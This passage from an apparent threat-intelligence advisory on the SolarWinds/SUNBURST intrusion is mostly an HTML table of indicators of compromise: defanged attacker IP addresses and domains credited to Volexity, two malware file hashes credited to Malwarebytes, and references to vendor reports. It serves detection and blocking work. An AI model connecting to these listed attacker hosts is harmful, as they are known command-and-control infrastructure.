546px; text-align: left;"><strong>&nbsp;8.18.144[.]130</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;IPv4</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;8.18.144[.]135</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;IPv4</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;8.18.144[.]136</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;IPv4</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;8.18.144[.]149</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;IPv4</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;8.18.144[.]156</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;IPv4</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;8.18.144[.]158</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;IPv4</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;8.18.144[.]165</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;IPv4</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;8.18.144[.]170</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;IPv4</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;8.18.144[.]180</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;IPv4</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;8.18.144[.]188</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;IPv4</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;8.18.145[.]3</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;IPv4</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;8.18.145[.]21</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;IPv4</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;8.18.145[.]33</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;IPv4</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;8.18.145[.]36</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;IPv4</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;8.18.145[.]131</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;IPv4</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;8.18.145[.]134</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;IPv4</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;8.18.145[.]136</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;IPv4</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;8.18.145[.]139</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;IPv4</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;8.18.145[.]150</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;IPv4</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;8.18.145[.]157</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;IPv4</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;8.18.145[.]181</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;IPv4</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;13.27.184[.]217</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;IPv4</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;">&nbsp;<a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;18.217.225[.]111</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;IPv4</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;">&nbsp;<a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;18.220.219[.]143</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;IPv4</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;20.141.48[.]154</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;IPv4</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;34.219.234[.]134</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;IPv4</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;184.72.1[.]3</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;IPv4</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;184.72.21[.]54</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;IPv4</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;184.72.48[.]22</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;IPv4</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;184.72.101[.]22</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;IPv4</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;184.72.113[.]55</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;IPv4</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;184.72.145[.]34</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;IPv4</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;184.72.209[.]33</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;IPv4</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;184.72.212[.]52</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;IPv4</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;184.72.224[.]3</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;IPv4</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;184.72.229[.]1</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;IPv4</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;184.72.240[.]3</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;IPv4</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;184.72.245[.]1</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;IPv4</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;196.203.11[.]89</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;IPv4</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;digitalcollege[.]org</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;domain</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;freescanonline[.]com</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;domain</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;globalnetworkissues[.]com</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;domain</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;kubecloud[.]com</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;domain</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;lcomputers[.]com</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;domain</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;seobundlekit[.]com</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;domain</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;solartrackingsystem[.]net</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;domain</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;thedoccloud[.]com</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;domain</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;virtualwebdata[.]com</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;domain</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;">&nbsp;<a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;webcodez[.]com</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;domain</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;d0d626deb3f9484e649294a8dfa814c5568f846d5aa02d4cdad5d041a29d5600</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;hash</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://blog.malwarebytes.com/threat-analysis/2020/12/advanced-cyber-attack-hits-private-and-public">https://blog.malwarebytes.com/threat-analysis/2020/12/advanced-cyber-attack-hits-private-and-public</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;c15abaf51e78ca56c0376522d699c978217bf041a3bd3c71d09193efa5717c71</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;hash</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://blog.malwarebytes.com/threat-analysis/2020/12/advanced-cyber-attack-hits-private-and-public">https://blog.malwarebytes.com/threat-analysis/2020/12/advanced-cyber-attack-hits-private-and-public</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;</td> </tr> </tbody> </table> <h3>References</h3> <ul> <li><a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">[1] Volexity: Dark Halo Leverages SolarWinds Compromise to Breach Organizations</a></li> <li><a href="https://www.solarwinds.com/securityadvisory">[2] SolarWinds Security Advisory</a></li> <li><a href="https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html">[3] FireEye: Highly Evasive Attacker Leverages SolarWinds Supply Chain to Compromise Multiple Global Victims With SUNBURST Backdoor</a></li> <li><a href="https://github.com/Azure/Azure-Sentinel/blob/master/Detections/SigninLogs/AzureAADPowerShellAnomaly.yaml">[4] GitHub: Azure / Azure-Sentinel - 